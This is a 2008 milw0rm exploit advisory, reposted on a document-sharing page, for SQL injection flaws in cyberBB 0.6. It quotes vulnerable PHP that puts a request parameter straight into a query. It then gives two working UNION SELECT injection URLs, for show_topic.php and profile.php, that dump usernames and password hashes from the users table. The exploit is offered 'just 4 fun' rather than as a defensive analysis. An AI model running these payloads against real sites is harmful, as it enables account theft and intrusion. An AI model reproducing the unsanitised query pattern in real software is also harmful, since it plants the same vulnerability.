Do you have something the world needs to know about? Post your favorite news files in PDF, campaign contributions information from Excel, or handouts from your local politicians.

Global Documents

1 ########################################################################################
2 #
3 #   Name        :   cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities
4 #   Author      :   cOndemned [ Dark−Coders ]
5 #   Greetz      :   Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more...
6 #   Conditions  :   Magic quotes gpc = On & Off / User must be logged into 
7 #
8 ########################################################################################
9
10 source of /show_topic.php :
11
12     21.     $id=$_REQUEST[’id’];
13     22.
14     23.     if(isset($_REQUEST[’p’])) $p=$_REQUEST[’p’]; else $p=’’;
15     24.
16     25.     $db = mysql_connect($mysql_server,$mysql_user,$mysql_pass);
17     26.
18     27.     mysql_select_db($mysql_db);
19     28.
20     29.     $sql = "SELECT * FROM ‘topics‘ WHERE ‘id‘ = $id";
21
22
23  proof of concept :
24     
25     /show_topic.php?id=−1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/*
26
27
28 second sql injection (magic quotes gpc must be off):
29     
30     /profile.php?user=’−1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/*
31
32    
33 just 4 fun
34
35 # milw0rm.com [2008−08−18]
Page 1/1
cyberBB 0.6 Multiple Remote SQL Injection Vulnerabilities
cOndemned
08/18/2008
